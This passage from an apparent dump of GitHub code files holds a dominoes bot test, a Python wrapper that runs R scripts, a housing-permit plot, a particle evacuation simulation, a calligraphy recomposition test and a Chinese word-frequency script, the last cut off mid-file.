BotMove(bot_game_state.dominoes[2], bot_game_state.all_trains[2]),\n                          BotMove(bot_game_state.dominoes[2], bot_game_state.all_trains[3]),\n                          BotMove(bot_game_state.dominoes[4], bot_game_state.all_trains[4]),\n                          BotMove(bot_game_state.dominoes[5], bot_game_state.all_trains[3]),\n                          BotMove(bot_game_state.dominoes[5], bot_game_state.all_trains[2]),\n                          BotMove(bot_game_state.dominoes[7], bot_game_state.all_trains[4]),\n                          BotMove(bot_game_state.dominoes[8], bot_game_state.all_trains[4])]\n        self.assertEqual(collections.Counter(expected_moves), collections.Counter(moves))\n\n    def test_get_all_paths_from(self):\n        game_state, bot_game_state = self.get_test_game_state()\n\n        path_dict = bot_game_state.get_all_paths_from(12)\n        self.assertEqual(1, len(path_dict))\n        paths = path_dict[12]\n\n        expected_paths = [Path([(12, 2)]),\n                          Path([(12, 0)]),\n                          Path([(12, 0), (0, 1)]),\n                          Path([(12, 0), (0, 1), (1, 3)]),\n                          Path([(12, 0), (0, 1), (1, 3), (3, 4)]),\n                          Path([(12, 0), (0, 1), (1, 3), (3, 6)]),\n                          Path([(12, 0), (0, 1), (1, 3), (3, 0)]),\n                          Path([(12, 0), (0, 3)]),\n                          Path([(12, 0), (0, 3), (3, 4)]),\n                          Path([(12, 0), (0, 3), (3, 6)]),\n                          Path([(12, 0), (0, 3), (3, 1)]),\n                          Path([(12, 0), (0, 3), (3, 1), (1, 0)])]\n        self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n        path_dict = bot_game_state.get_all_paths_from(3)\n        self.assertEqual(1, len(path_dict))\n        paths = path_dict[3]\n\n        expected_paths = [Path([(3, 4)]),\n                          Path([(3, 6)]),\n                          Path([(3, 0)]),\n                          Path([(3, 1)]),\n                          Path([(3, 1), (1, 0)]),\n                          Path([(3, 1), (1, 0), (0, 12)]),\n                          Path([(3, 1), (1, 0), (0, 12), (12, 2)]),\n                          Path([(3, 1), (1, 0), (0, 3)]),\n                          Path([(3, 1), (1, 0), (0, 3), (3, 4)]),\n                          Path([(3, 1), (1, 0), (0, 3), (3, 6)]),\n                          Path([(3, 0), (0, 12)]),\n                          Path([(3, 0), (0, 12), (12, 
2)]),\n Path([(3, 0), (0, 1)]),\n Path([(3, 0), (0, 1), (1, 3)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 6)])]\n self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n def test_get_longest_paths_from(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n paths = bot_game_state.get_longest_paths_from(bot_game_state.get_playable_numbers())\n expected_paths = [Path([(12, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 6)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 0)]),\n Path([(12, 0), (0, 3), (3, 1), (1, 0)]),\n Path([(3, 1), (1, 0), (0, 12), (12, 2)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 4)]),\n Path([(3, 1), (1, 0), (0, 3), (3, 6)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 4)]),\n Path([(3, 0), (0, 1), (1, 3), (3, 6)])]\n self.assertEqual(collections.Counter(expected_paths), collections.Counter(paths))\n\n def test_get_playable_numbers(self):\n game_state, bot_game_state = self.get_test_game_state()\n playable_numbers = bot_game_state.get_playable_numbers()\n self.assertEqual(collections.Counter(playable_numbers), collections.Counter([3, 10, 12, 12]))\n\n def test_get_biggest_plays_from(self):\n game_state, bot_game_state = self.get_test_game_state()\n\n plays = bot_game_state.get_biggest_plays_from(bot_game_state.get_playable_numbers())\n expected_play = Play([Path([(10, 10)]),\n Path([(12, 2)]),\n Path([(3, 4)]),\n Path([(12, 0), (0, 1), (1, 3), (3, 0)])])\n\n self.assertEqual(28, len(plays))\n self.assertIn(expected_play, plays)\n","repo_name":"Pellanor/MexicanTrain","sub_path":"tst/bots/BotGameStateTest.py","file_name":"BotGameStateTest.py","file_ext":"py","file_size_in_byte":9755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30525758096","text":"# -*- coding:utf-8 -*-\nimport subprocess as sp\nimport os\nimport time\n\nfrom contextlib import contextmanager\nfrom collections import OrderedDict, namedtuple\n\n\nParsedCompletedCommand = namedtuple(\n 'ParsedCompletedCommand',\n ['returncode', 'args', 'stdout', 'stderr']\n)\n\n\nclass Rscript:\n \"\"\"\n Using subprocess to call Rscript execute R program\n :type file: str, target R file\n :type cmd: str, parameter of target R file \n :type folder: str, default '', only support the sub folder \n\n example:\n >>> import os\n >>> from pyRscript import pyRscript\n >>> RPATH = '/home/pyRscript' # also ex: os.path.join(os.path.dirname(os.path.abspath('test.R')), 'R')\n >>> cmd = '-d,SN1234,-t,2017-07-13 00:00:00'\n >>> r = pyRscript.Rscript(path=RPATH, file='test.R', cmd=cmd)\n >>> print(r)\n >>> \n >>> ret = r.execute()\n >>> print(ret)\n >>> ParsedCompletedCommand(returncode=0, args=['Rscript', 'test.R', '-d', 'SN1234', '-t', '2017-07-13 00:00:00'], stdout='2017-12-03 11:35:38 INFO::Execute R\\n2017-12-03 11:35:39 INFO::id: SN1234, time: 2017-07-13 00:00:00', stderr='Loading required package: methods')\n >>> print(ret.returncode)\n >>> 0\n >>> print(ret.stdout)\n >>> '2017-12-03 11:37:59 INFO::Execute R\\n2017-12-03 11:37:59 INFO::id: SN1234, time: 2017-07-13 00:00:00'\n >>> print(ret.stderr)\n >>> 'Loading required package: methods'\n \"\"\"\n\n def __init__(self, path, file, cmd=None):\n super(Rscript, self).__init__()\n self.file = file\n self.path = path\n if cmd is None:\n self.cmd = []\n else:\n self.cmd = cmd.split(',')\n\n @contextmanager\n def cd(self, newdir):\n \"\"\"\n go to the path\n \"\"\"\n prevdir = os.getcwd()\n os.chdir(newdir)\n try:\n yield\n finally:\n 
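# restore the caller's working directory even if the body of the with-block raised\n            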
os.chdir(prevdir)\n\n def decode_cmd_out(self, completed_cmd):\n \"\"\"\n return a standard message\n \"\"\"\n try:\n stdout = completed_cmd.stdout.encode('utf-8').decode()\n except AttributeError:\n try:\n stdout = str(bytes(completed_cmd.stdout), 'big5').strip()\n except AttributeError:\n stdout = str(bytes(completed_cmd.stdout).decode('utf-8')).strip()\n try:\n stderr = completed_cmd.stderr.encode('utf-8').decode()\n except AttributeError:\n try:\n stderr = str(bytes(completed_cmd.stderr), 'big5').strip()\n except AttributeError:\n stderr = str(bytes(completed_cmd.stderr).decode('utf-8')).strip()\n return ParsedCompletedCommand(\n completed_cmd.returncode,\n completed_cmd.args,\n stdout,\n stderr\n )\n\n def run_command_under_r_root(self, cmd, catched=True):\n \"\"\"\n subprocess run on here\n \"\"\"\n RPATH = self.path\n with self.cd(newdir=RPATH):\n if catched:\n process = sp.run(cmd, stdout=sp.PIPE, stderr=sp.PIPE)\n else:\n process = sp.run(cmd)\n return process\n\n def execute(self):\n \"\"\"\n Execute R script\n \"\"\"\n rprocess = OrderedDict()\n commands = OrderedDict([\n (self.file, ['Rscript', self.file] + self.cmd),\n ])\n for cmd_name, cmd in commands.items():\n rprocess[cmd_name] = self.run_command_under_r_root(cmd)\n \n return self.decode_cmd_out(completed_cmd=rprocess[self.file])\n\n def __repr__(self):\n fmt = f''\n return fmt\n\n\n","repo_name":"chairco/pyRscript","sub_path":"pyRscript/pyRscript.py","file_name":"pyRscript.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10243782177","text":"\"\"\"Simple plot of units allowed per county vs year\"\"\"\n\nfrom collections import defaultdict\nimport csv\nimport datetime as dt\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\n\n# Read the data into arrays:\n# years: a list of datetime objects from column 1 of the file\n# units_allowed: a dict of county to units allowed per year from columns 2-4\n#\nyears = []\nunits_allowed = defaultdict(list)\nwith open('darrell_demo.csv') as csvfile:\n csvreader = csv.DictReader(csvfile)\n for row in csvreader:\n for county, units in row.items():\n if county == 'year':\n year = dt.datetime.strptime(units, '%Y')\n years.append(year)\n else:\n units_allowed[county].append(float(units))\n\n# Make plot\n#\nplt.style.use('fivethirtyeight') # Optional plot style\nfig, axis = plt.subplots() # create figure and data-axis objects\n\n# Draw the series:\nfor county, units in units_allowed.items():\n axis.plot(years, units, marker='o', linestyle='--', linewidth=0.9, label=county)\n\n# Legend and axis labels (subtitle's a little tricky)\naxis.xaxis.set_major_formatter(mdates.DateFormatter('%Y')) # print only year on x-axis\naxis.legend(loc='best') # put the legend in a good place\naxis.set_xlabel('Year')\naxis.set_ylabel('Units Permitted')\naxis.set_title('Bay Area County Housing Production')\nplt.suptitle('Units Permitted by County', y=0.88) # hacky subtitle\n\n# Force a fullscreen display, and draw to the screen\nplt.get_current_fig_manager().full_screen_toggle()\nplt.show()\n","repo_name":"kesterallen/dateplottingdemo","sub_path":"darrell_demo.py","file_name":"darrell_demo.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23941929211","text":"import cv2\nimport numpy as np\nfrom IPython import display as display\n\nimport ipywidgets as ipw\nimport PIL\nfrom io import 
BytesIO\nimport random\n\nclass Particle:\n MAX_VELOCITY = np.sqrt(4)\n \n def __init__(self, x_position, y_position, x_velocity, y_velocity, radio, is_wall_particle = False):\n self.radio = radio\n self.position = np.array([float(x_position), float(y_position)])\n self.velocity = np.array([float(x_velocity), float(y_velocity)])\n self.is_wall_particle = is_wall_particle\n self.force = np.array([0.0, 0.0])\n \n def normalize_vector(self, x):\n norm = np.linalg.norm(x)\n if norm == 0:\n return x * np.inf\n return x / norm\n \n def calculate_force(self, particle):\n if self.is_wall_particle:\n return np.array([0.,0.])\n position2 = particle.position\n distance = np.linalg.norm(self.position - position2)\n if distance <= self.radio + particle.radio:\n return self.normalize_vector(self.position - position2) / (distance ** 2)*100\n \n return np.array([0.,0.])\n \n def update_position(self):\n if self.is_wall_particle:\n return\n self.position += self.velocity\n\n def update_velocity(self):\n if self.is_wall_particle:\n return\n self.velocity += self.force\n\n velocity_magnitude = np.linalg.norm(self.velocity)\n\n if velocity_magnitude > self.MAX_VELOCITY:\n self.velocity = self.normalize_vector(self.velocity) * self.MAX_VELOCITY\n return\n \n def graph(self, x0, y0, img):\n if self.is_wall_particle:\n color = (255, 255, 255)\n cv2.circle(img, (int(x0 + self.position[0]), int(y0 - self.position[1])), int(self.radio) - 10, color, -1)\n else:\n color = (255, 0, 0)\n cv2.circle(img, (int(x0 + self.position[0]), int(y0 - self.position[1])), int(self.radio), color, -1)\n\n \n return\n\n\nparticles = []\n\ndef lineOfWallParticles(x1, y1, x2, y2, N):\n x=np.linspace(x1, x2, N)\n y=np.linspace(y1, y2, N)\n for i in range(N):\n particles.append(Particle(x[i], y[i], 0, 0, 20, True))\n\nwIm = ipw.Image()\ndisplay.display(wIm)\n\nmaxX=500\nmaxY=500\nx0 = int(maxX/2)\ny0 = int(maxY/2)\nparticles_radio = 6\n \nimg = np.zeros((500, 500, 3), dtype=\"uint8\")\n\nheight = 100\nwidth = 100\nlineOfWallParticles(-width,height,width,height, int(width / 10 + 3)) # Bottom boundary\nlineOfWallParticles(-width,-height,width,-height, int(width / 10 + 3)) # Upper boundary\nlineOfWallParticles(-width,height,-width,-height, int(height / 10 + 3)) # Left boundary\n#lineOfWallParticles(width,-height,width,height, int(height / 10 + 3))\nlineOfWallParticles(width,-height,width,-20, int(height / 10 + 3)) \nlineOfWallParticles(width,20,width,height, int(height / 10 + 3))\n\n# Draw obstacle in front of exit\nlineOfWallParticles(45,5,55,0, 2)\nlineOfWallParticles(55,0,45,-5, 2)\nlineOfWallParticles(45,-5,35,0, 2)\nlineOfWallParticles(35,0,45,5, 2)\n\nfor i in range(50):\n particles.append(Particle(random.randint(-width + 20, -width + 40), random.randint(-height + 20, height - 20), random.random(), random.random() - 0.5, particles_radio))\n #particles.append(Particle(random.randint(-width + 20, width - 20), random.randint(-height + 20, height - 20), random.random(), random.random() - 0.5, particles_radio))\n\nMaxIterations = 10000\n\nNumParticles = len(particles)\nexit = np.array([200, 0])\n\n\nfor count in range(MaxIterations):\n img[:] = (0, 0, 0)\n for i in range(NumParticles):\n for j in range(NumParticles):\n if i != j:\n Fij = particles[i].calculate_force(particles[j])\n particles[i].force += Fij\n # Add a force to pull them to the exit\n norm = np.linalg.norm(exit - particles[i].position)\n exit_force = (exit - particles[i].position ) / (norm if norm > 0 else 1)\n exit_force[0] *= 0.001\n exit_force[1] *= 0.009\n 
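# the y component is pulled roughly 9x harder than x; these weights look hand-tuned to funnel particles toward the exit gap at (200, 0)\n            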
particles[i].force += exit_force\n\n for particle in particles:\n particle.update_velocity()\n particle.update_position()\n particle.graph(x0, y0, img)\n particle.force[:] = 0\n pilIm = PIL.Image.fromarray(img, mode=\"RGB\")\n with BytesIO() as fOut:\n pilIm.save(fOut, format=\"png\")\n byPng = fOut.getvalue()\n \n wIm.value=byPng ","repo_name":"DonaldoAyala/evolutionary-computing","sub_path":"7 - Particle Systems/evacuation.py","file_name":"evacuation.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20639714799","text":"# coding: utf-8\nimport os\nimport cv2\nimport time\n\nfrom calligraphyJiZiByStrokeCompose.util import query_char_info, query_char_target_strokes, stroke_recompose, \\\n load_stroke_library_dataset, query_char_info_from_chars_list, query_char_target_stroke_by_dataset\n\n\ndef recompose():\n start_time = time.time()\n stroke_lib_path = \"../../../Data/Stroke_recomposed_tool/strokes dataset\"\n\n save_path = \"../../../Data/1000 generated results\"\n dataset = load_stroke_library_dataset(stroke_lib_path)\n print(\"Load dataset time: \", time.time() - start_time)\n\n heng_zhe = dataset['横折横折']\n print(len(heng_zhe))\n\n chars = ['犍']\n\n char_info_list = query_char_info_from_chars_list(chars)\n\n char_target_strokes_list = query_char_target_stroke_by_dataset(dataset, char_info_list)\n\n generated_imgs, _ = stroke_recompose(char_info_list, char_target_strokes_list)\n\n for i in range(len(generated_imgs)):\n cv2.imshow('img_%d' % i, generated_imgs[i])\n cv2.imwrite(os.path.join(save_path, \"%s_%04d.png\" % (chars[0], 0)), generated_imgs[i])\n\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\nif __name__ == '__main__':\n recompose()","repo_name":"plateaukao/CSInTraditionalChineseCalligraphy","sub_path":"calligraphyJiZiByStrokeCompose/recompose_algorithm_test.py","file_name":"recompose_algorithm_test.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"72213530066","text":"#!/usr/bin/python\r\nimport os\r\n\r\n#Final Diagramación Lógica / Fecha: 2/6/18\r\n#Tema: Crear un WC - Contador de palabras, líneas y caracteres.\r\n#Alumno: Alberto Campagna\r\n#IFTS 18 - Analista de Sistemas\r\n\r\n# ----------------------- MENU ----------------------- #\r\ndef menu():\r\n print('')\r\n print(\"--------------------\")\r\n print(\"- Programa WC -\")\r\n print(\"--------------------\")\r\n print('')\r\n print('1. Ingresar archivo')\r\n print('2. Mostrar archivo')\r\n print('3. Buscador archivo')\r\n print('4. 
Salir')\r\n print('')\r\n# --------------------- PALABRAS --------------------- #\r\ndef palabras():\r\n cant_palabras = len(contenido3)\r\n return(cant_palabras)\r\n# ---------------------- LINEAS ---------------------- #\r\ndef lineas():\r\n cant_lineas = sum(1 for line in open(ingreso))\r\n return(cant_lineas)\r\n# --------------------- PARRAFOS --------------------- #\r\ndef parrafos():\r\n parrafos = contenido.split('.\\n')\r\n cant_parrafos = len(parrafos)\r\n return(cant_parrafos)\r\n# ---------------------- LETRAS ---------------------- #\r\ndef letras():\r\n letras = 0\r\n for i in contenido3:\r\n letras = letras + len(i)\r\n return(letras)\r\n# ---------------------------------------------------- #\r\n\r\nwhile True:\r\n menu()\r\n try:\r\n opcion = int(input('Ingrese una opción: '))\r\n if opcion == 4:\r\n print (' ')\r\n print('Gracias por usar este programa.')\r\n break\r\n ingreso = input('Ingrese el archivo: ')\r\n archivo = open(ingreso,'r')\r\n contenido = archivo.read()\r\n contenido1 = contenido.replace('\\n',' ')\r\n contenido2 = contenido1.replace(' ',' ')\r\n contenido3 = contenido2.split(\" \")\r\n \r\n if opcion == 1:\r\n print('')\r\n print('El texto tiene {} palabras, {} líneas, {} párrafos y {} letras.'\r\n .format(palabras(),lineas(),parrafos(),letras()))\r\n print('')\r\n \r\n elif opcion == 2:\r\n archivo = open(ingreso,'r')\r\n for linea in archivo.readlines(): \r\n print (linea)\r\n archivo.close()\r\n \r\n elif opcion == 3:\r\n archivo = open(ingreso,'r')\r\n string = input('Ingrese que palabra buscar: ')\r\n lista = contenido.count(string)\r\n print('La letra/palabra \"{}\" aparece {} veces.'.format(string,lista))\r\n \r\n elif opcion != 1 or 2 or 3 or 4 or 0:\r\n menu()\r\n\r\n archivo.close()\r\n \r\n except:\r\n print('Ingrese una opción correcta.')\r\n","repo_name":"campa79/Python","sub_path":"final_wc3_OK_Extras.py","file_name":"final_wc3_OK_Extras.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34617075785","text":"import smbus\nimport time\nfrom time import sleep\nimport sys\n\n#libs for osc\nimport argparse\nfrom pythonosc import udp_client\n\nbus = smbus.SMBus(1)\n\nbus.write_byte_data(0x53, 0x2C, 0x0B)\nvalue = bus.read_byte_data(0x53, 0x31)\nvalue &= ~0x0F;\nvalue |= 0x0B; \nvalue |= 0x08;\nbus.write_byte_data(0x53, 0x31, value)\nbus.write_byte_data(0x53, 0x2D, 0x08)\n\n#osc sender args\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--ip\", default=\"127.0.0.1\")\nparser.add_argument(\"--port\", type=int, default=5005)\nargs = parser.parse_args()\nclient = udp_client.SimpleUDPClient(args.ip, args.port)\n\n\ndef getAxes():\n bytes = bus.read_i2c_block_data(0x53, 0x32, 6)\n \n x = bytes[0] | (bytes[1] << 8)\n if(x & (1 << 16 - 1)):\n x = x - (1<<16)\n\n y = bytes[2] | (bytes[3] << 8)\n if(y & (1 << 16 - 1)):\n y = y - (1<<16)\n\n z = bytes[4] | (bytes[5] << 8)\n if(z & (1 << 16 - 1)):\n z = z - (1<<16)\n\n x = x * 0.004 \n y = y * 0.004\n z = z * 0.004\n\n x = x * 9.80665\n y = y * 9.80665\n z = z * 9.80665\n\n x = round(x, 4)\n y = round(y, 4)\n z = round(z, 4)\n\n #print(\" x = %.3f ms2\" %x)\n #print(\" y = %.3f ms2\" %y)\n #print(\" z = %.3f ms2\" %z)\n client.send_message(\"/a\", [x, y, z])\n\n\n \n return {\"x\": x, \"y\": y, \"z\": z}\n \ntry:\n while True: \n getAxes()\n #client.send_message(\"/accel\", [x, y, z])\n time.sleep(0.01)\nexcept KeyboardInterrupt:\n 
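# Ctrl-C ends the sampling/OSC loop; exit cleanly\n    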
sys.exit()\n","repo_name":"markijzerman/zouthavenbrug","sub_path":"old/ADXL345.py","file_name":"ADXL345.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"702559228","text":"import pandas as pd\nimport streamlit as st\nimport numpy as np\nimport plotly.express as px\n\n\n# title of the webpage\nst.title('COVID-19 India Dashboard')\n\n# add side bar of the webpage\nst.sidebar.title('Data Visualizer')\nst.sidebar.markdown('Use the options in the sidebar to create 🖱️ custom Charts 📊 and Graphs 📉')\nst.markdown('This is a webapp to Visualize 📈 COVID-19 🦠 pandemic situation in India 🌏 ')\n\n\n@st.cache(persist=True)\ndef load_state_data():\n    state_data = pd.read_csv('https://api.covid19india.org/csv/latest/state_wise.csv')\n    state_data['Death Rate (%)'] = round(state_data['Deaths']/state_data['Confirmed'], 4)*100\n    return state_data\nstate_data = load_state_data()\n\n# st.button returns True only on the rerun triggered by the click, so use it directly as the condition\nif st.button('Re-Run'):\n    st.write('Refreshing Data')\n    state_data = load_state_data()\ndef homepage():\n    import datetime\n    now = datetime.datetime.now()\n    value = []\n    key = ['Number of Days since 1st Infection 🗓️', 'Total Number of Confirmed Cases 🤒',\n           'Total Number of Recovered 😊', 'Total Number of Deaths 💀', 'Total Number of Active Cases ➕', 'Death Rate (%) ⚰️']\n    start = 'Jan 31 2020'; start = pd.to_datetime(start); start = start.dayofyear\n    today = pd.to_datetime(now).dayofyear\n    value.append(today-start)\n    value.append(state_data[(state_data['State'] == 'Total')]['Confirmed'][0])\n    value.append(state_data[(state_data['State'] == 'Total')]['Recovered'][0])\n    value.append(state_data[(state_data['State'] == 'Total')]['Deaths'][0])\n    value.append(state_data[(state_data['State'] == 'Total')]['Active'][0])\n    value.append(round(value[3]/value[1], 4)*100)\n    return pd.DataFrame({'Text': key, 'Number': value})\nhomepage = homepage()\nst.write(homepage)\n\n\n# show main table with top 10 infected countries\n# add subheader for the side bar\nst.sidebar.subheader('Choose the type of Graph you want')\n\n# add dropdown\nselect = st.sidebar.selectbox('Visualization type', ['Death Rate %', 'Top 10 Infected States'], key='1')\nif not st.sidebar.checkbox('Hide Graphs', True):\n    if select == 'Death Rate %':\n        st.markdown('### Bar Chart depicting Death Rate (%) of Indian states')\n        state_data['Death Rate (%)'] = round(state_data['Deaths']/state_data['Confirmed'], 4)*100\n        death_perc = state_data[['State', 'Death Rate (%)']].sort_values(by='Death Rate (%)', ascending=False)[:29]\n        fig = px.bar(death_perc, x='State', y='Death Rate (%)', height=600, width=800)\n        st.plotly_chart(fig)\n    elif select == 'Top 10 Infected States':\n        st.markdown('### Table depicting 10 States with maximum number of Confirmed Cases')\n        top10 = state_data[['State', 'Confirmed', 'Recovered', 'Deaths', 'Active', 'Death Rate (%)']][1:11]\n        st.write(top10)\n\n\n\n# input text box\nst.sidebar.subheader('State Data comparison')\nstate = st.sidebar.text_input('Enter up to five State codes separated by comma')\nstate = state.split(', ')\nstate\nif not st.sidebar.checkbox('Hide Table', False):\n    #st.markdown(f'Showing data for {state}')\n    st_len = len(state)\n    if st_len > 5:\n        st.write('Please enter no more than 5 State codes at once')\n    elif st_len == 5:\n        st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2]) | (state_data['State_code'] == state[3]) | 
(state_data['State_code'] == state[4])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 4:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2]) | (state_data['State_code'] == state[3])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 3:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1]) | (state_data['State_code'] == state[2])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 2:\n st.write(state_data[(state_data['State_code'] == state[0]) | (state_data['State_code'] == state[1])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 1:\n st.write(state_data[(state_data['State_code'] == state[0])][['State', 'Confirmed', 'Recovered', 'Deaths', 'Active']].reset_index(drop=True))\n elif st_len == 0:\n st.write('Please enter State code to enable Graph')\n","repo_name":"farzandkhan-zz/COVID-19","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34648659077","text":"# -*- coding: utf-8 -*-\n# Django settings for LikedFeed project. LikedFeed live on http://emrah.webfactional.com\n\nDEBUG = False\nTEMPLATE_DEBUG = True\n\nADMINS = (\n # ('Emrah', 'emrah@alemgir.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = 'likedfeed' # Or path to database file if using sqlite3.\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n\nSITE_HOST = '127.0.0.1:8000'\nMAIL_HOST = ''\n\nEMAIL_PORT = ''\n\nEMAIL_HOST_USER = ''\n\nEMAIL_HOST_PASSWORD = ''\nEMAIL_USE_TLS = True \nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Istanbul'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'tr'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'vlc!z&07ct16k%i1mv!e3op)&nb=%o4m)%3^ar-32hph7115!j'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n    'django.template.loaders.filesystem.load_template_source',\n    'django.template.loaders.app_directories.load_template_source',\n#    'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.middleware.common.CommonMiddleware',\n    'django.contrib.csrf.middleware.CsrfMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'LikedFeed.urls'\n\nimport os.path\nTEMPLATE_DIRS = (\n    os.path.join(os.path.dirname(__file__), 'tema'),\n)\n\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.sites',\n    'django.contrib.admin',\n    'django.contrib.comments',\n    'django.contrib.markup',\n    'LikedFeed.bookmarks',\n)\nimport django.contrib.auth\ndjango.contrib.auth.LOGIN_URL = '/login/'\n\nfrom django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS\nTEMPLATE_CONTEXT_PROCESSORS += (\n    'django.core.context_processors.request',\n)\n","repo_name":"emrahtokalak/WebBased-Social-Bookmarking-Applications","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"16932972890","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @time : 2020/10/25 11:07\n# @author : Mo\n# @function: rule-word-freq, 统计各类别独有词汇的词频等\n\n\n# 适配linux\nimport sys\nimport os\npath_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\nsys.path.append(path_root)\nprint(path_root)\n# macadam\nfrom utils.text_tools import jieba_cut, txtRead, txtWrite, load_json, save_json\nfrom conf.path_config import stop_words_path\nfrom collections import Counter, OrderedDict\nfrom tqdm import tqdm\nimport jieba\nimport json\nimport copy\n\n\n# 停用词列表,默认使用hanlp停用词表\nf_stop = open(stop_words_path, \"r\", encoding=\"utf-8\")\nstop_words = []\nfor stop_word in f_stop.readlines():\n    stop_words.append(stop_word.strip())\n\n# stop_words = [\"\\t\"]\n\n\ndef is_total_number(text: str) -> bool:\n    \"\"\"\n    judge is total number or not, 判断是不是全是数字\n    Args:\n        text: str, eg. \"macadam, 碎石路\"\n    Returns:\n        bool, True or False\n    \"\"\"\n    for word in text:\n        if word not in \"0123456789.%\":\n            return False\n    return True\n\n\ndef statistics_keyword_by_label(path, rate=1):\n    \"\"\"\n    statistics of unique keywords and their frequency by label, 统计各类别独有词汇的词频\n    Args:\n        path: str, eg. \"train.json\"\n        rate: float, eg. 
0.75\n Returns:\n None\n \"\"\"\n datas = txtRead(path)\n\n lwd = {}\n for i in tqdm(range(len(datas)), desc=\"jieba cut and statistics: \"):\n # 从标准文档里边获取文本, 切词处理\n d = datas[i]\n d_json = json.loads(d)\n text = d_json.get(\"x\", {}).get(\"text\")\n label = d_json.get(\"y\")\n word_list = list(jieba.cut(text))\n # 去除 停用词、全数字、1个字\n word_list = [wl for wl in word_list if wl not in stop_words and not is_total_number(wl) and len(wl) >= 2]\n # 词频统计(类别内)\n word_freq_dict = dict(Counter(word_list))\n if label not in lwd:\n lwd[label] = word_freq_dict\n else:\n lwd[label].update(word_freq_dict)\n\n # 取范围, 排序\n lwd_keys = list(lwd.keys())\n lwd_soft = [sorted(lwd[l].items(), key=lambda x: x[1], reverse=True) for l in lwd_keys]\n lwd_soft_rate = [s[:int(len(s) * rate)] for s in lwd_soft]\n label_word_dict = {lwd_keys[i]: OrderedDict(lwd_soft_rate[i]) for i in range(len(lwd_keys))}\n print(\"cut ok!\")\n # 获取每个类独有的词汇\n label_keys = 